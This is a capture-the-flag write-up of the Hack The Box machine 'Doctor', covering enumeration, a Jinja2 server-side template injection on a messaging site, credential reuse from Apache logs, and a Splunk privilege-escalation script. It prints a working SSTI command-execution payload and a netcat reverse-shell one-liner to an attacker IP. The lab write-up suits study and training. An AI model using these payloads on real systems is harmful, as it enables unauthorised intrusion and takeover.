# DOCTOR | 10.10.10.209

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.209

### Ports and Services

#### 22 - SSH - OpenSSH 8.2p1

If I get valid credentials I will try to use them here to get a stable shell.

#### 80 - HTTP - Apache 2.4.41 Ubuntu

It is a webpage for a doctor's clinic.

![homepage](img/homepage.png)

All of the links on the homepage go to pages that are duplicates of the homepage.
There are potential usernames on the page (as well as the username 'admin'):

![potential usernames](img/names.png)

A gobuster query does not reveal anything interesting either:

    gobuster dir -u http://10.10.10.209 -t 50 -x html,php,txt -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt | tee gobuster.log

![gobuster on port 80](img/gobuster-80.png)

I also ran nikto against the port, and usually nothing comes of it, but this time there might be something useful:

![nikto scan](img/nikto-80.png)

Turns out, that output hints at something that is not really there. All you get is a basic dir listing of the images. Same goes with `/css`, `/js` and `/fonts`.

#### 8089 - SSL/HTTP - Splunkd httpd

Some kind of data monitoring service, the main page is just a simple hub for serving what look to me to be RSS feeds:

![splunk page](img/atom-feed.png)

Most of the links lead to a login dialog, and I don't have credentials for it:

![splunk login dialog](img/splunk-login.png)

I have no idea what to do with this one yet. Hopefully it is useful later...

### /etc/hosts

There was something that stood out just a bit on the main webpage, and that was an email - `info@doctors.htb`. So I added that to the `/etc/hosts` file and went to the website, and suddenly I am presented with a login screen for a 'secure messaging' service:

![doctors secure messaging](img/messaging.png)

So I signed up for an account, which apparently expires after 20 minutes. I also ran gobuster on it to see what it could pick up:

![gobuster scan doctors.htb](img/gobuster-doctors.png)

The `/archive` is a blank page, but the source is XML and is a simple list of your user's posts, which I did not grab before my account was deleted. But look - I found something more interesting:

![a post by the admin](img/admin-post.png)

Strange that I can see that, but it lets me know there is an admin account at least.

## Exploitation - SSTI > shell

This part was hard. I consulted the forum for some hints, and they helped a little. I spent a while testing for SQL injections, and then XSS only to find that none of those worked. The only thing I had was the relationship between the messages I created as a user and the 'hidden' XML output on the unfinished `/archive` page.

With a forum hint I went looking for SSTI (Server Side Template Injection) vulnerabilities, and I used the page from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) as a guide. An SSTI allows attackers to inject template code into existing templates. The templating engine will execute the code for you, which can sometimes allow you to read/write/upload files, or to run shell commands.

There was a tool called 'tplmap' that was suggested to test for SSTI, but it did not find anything for me. I had to manually test for a potential vuln, then figure out which templating engine was in use, then try to find a command that didn't break the `/archive` page.

I discovered that if I created a message title of `{{7*'7'}}` that it would result in a response in the XML of the `/archive` page that meant the templating engine was Jinja2.

![new message](img/test2.png)

![XML response](img/7777777.png)

After trying a LOT of methods, I found one thing I could put in the title of a message that resulted in limited command execution:
    `{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()}}`

Putting in this command for a netcat OpenBSD reverse shell (in the place of `ls`) worked!

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 6969 >/tmp/f

![user shell](img/user-shell.png)

## Privilege Escalation - web > shaun

I ran linpeas with this web user, and I definitely had to look closely to see anything of note. One thing is that this user is in the 'adm' group, which allows them to read log files. Linpeas picked up some interesting info from the Apache logs, of a user trying to change/reset their password:

![Apache log entry](img/reset-pass.png)

So the first thing I tried this (shaun:Guitar123) on was the login interface for the splunk service that was running on port 8089, and it actually worked:

![splunk admin page](img/splunk-admin.png)

But I still had no clue what to do so I once again set it aside and tried using the credentials to login via SSH. No dice.

Then I went even more basic and from my `web` shell I typed `su shaun`:

![shaun shell](img/shaun-shell.png)

### User Flag

![user flag](img/user-flag.png)

## Privesc - shaun > root

It was finally time to return to the issue of splunk since I saw that it was running as root:

![splunkd running as root](img/splunk-asroot.png)

The version was 8.0.5, and the exploits on searchsploit were all for older versions.

Google searching splunk privesc - first result is [this](https://github.com/tevora-threat/splunk_local_privesc) shell script that creates a malicious splunk app with a payload that makes an SUID copy of `/bin/sh` (in this case since it's Ubuntu it's actually `/bin/dash`). The script then makes a curl POST request to update the splunk instance with a path to the malicious app, waits 3 seconds, then deletes the app. The result should be an SUID copy of `/bin/dash` located in the `/tmp/.tester.bin` directory.

I just have to convert the valid creds - shaun:Guitar123 to base64 and replace what is there. It is important to make sure you do not have any line breaks after:

    echo -n shaun:Guitar123 | base 64

Then transfer the script over to the target and run, and follow instructions in the script.

After, I just run `/tmp/.tester/bin/shdoor -p` and I am root:

![root shell](img/root-shell.png)

### Root Flag

![root flag](img/root-flag.png)

## Conclusion

Definitely one of the more difficult footholds and initial exploits I have done - I had previously never heard of Server Side Template Injection so it was quite a crash course of frustration and confusion for hours and hours. The privesc from web to shaun took longer than I am willing to admit, but all it took was closely looking at the enumeration script output, then putting two and two together. The privesc to root was certainly interesting and new to me as well, and I am glad to learn of it.

I think this was the first active box I have ever owned on Hack the Box; all the others were retired. So wow, now I have 1 point!

**Steps taken:**

* Discover secure messaging service at doctors.htb
* Discover SSTI vuln in create message title section, get reverse shell as 'web'
* Find password in Apache logs, move laterally to shaun
* Use splunk local root exploit to privesc
